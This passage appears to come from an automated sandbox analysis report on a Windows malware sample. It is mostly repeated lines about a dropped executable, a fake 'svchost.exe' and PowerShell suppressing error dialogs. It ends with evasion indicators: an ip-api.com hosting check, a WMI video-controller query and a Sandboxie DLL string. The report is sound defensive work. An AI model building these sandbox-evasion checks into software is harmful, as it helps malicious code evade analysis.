                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                Source: C:\Users\user\AppData\Roaming\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: svchost.exe, 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
                Source: FullOption_2.1Xenos.exe, 00000002.00000002.1682898125.00000000027F1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL?1BACBVD8VOSDNODQXYKYKOXGCYB3L4H?XCITP4RXVNDTI8LNZ5A14XDDTULYW2Q?QDU75J9E9ZOPQDKVOU2JYVBLVNBFALY?OOXPU559F4RWTSRV9EANW2ZO42GGH6W?DE1LG4YYVDX7NM9MHXPCIRR0LERTDOU?OTLGKTGYHLIUQO0VTPBJ9O2BJMSFQVS?MLQ8RHEN8WZC8Y9O8CUQEPKAJPFIR1M?GHQBU1PKCTUDZX8N6DUED1SCBUXPWCE?CBIQBXJ8NGHLEGU7NZU2CWP5KVXJ3LO
                Source: file.exe, 00000000.00000002.1672288398.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1667439637.0000000000A32000.00000002.00000001.01000000.00000007.sdmp, svchost.exe.0.dr | Binary or memory string: SBIEDLL.DLLEF2TM6EI7BFXPX3GLXOMH4VTAFPF20UKO0S73JUDVEV21Q32MTBELASD866LCU32CDJRMIP4DNZ0LZIJKVPVQNIBFKIYYEEP71OXOXELM4CSZ9WVZ3RA4CY8B4ME4J9B5CQAQMV9URHZ2Z3MAGWCEW1RYEDD1H7NYCW4BJZSAKWQPX2HQWDYG5OBASDJF2SY1KSVU3YBIJA3ECZEKCEFQ6ZCWIRFABI3IONFL6UXQDRQCJ1UAS1DP0TC2MJ1JNJE2ELMCPVARDWIHP8IKOFNBZ2TR6I9W6FWDSOGT0MAHXXMJ48DOCEFDHMCSSZZV5H397082KZCSPSXDN5NOEMU08DND9LLCL4NCKLS4
                Source: C:\Users\user\Desktop\file.exe | Memory allocated: 11E0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe | Memory allocated: 1AC80000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Memory allocated: C40000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Memory allocated: 1A7F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory allocated: 2E00000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory allocated: 1AE00000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Memory allocated: 1330000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Memory allocated: 1AE40000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory allocated: 2CC0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory allocated: 1ACC0000 memory reserve | memory write watch
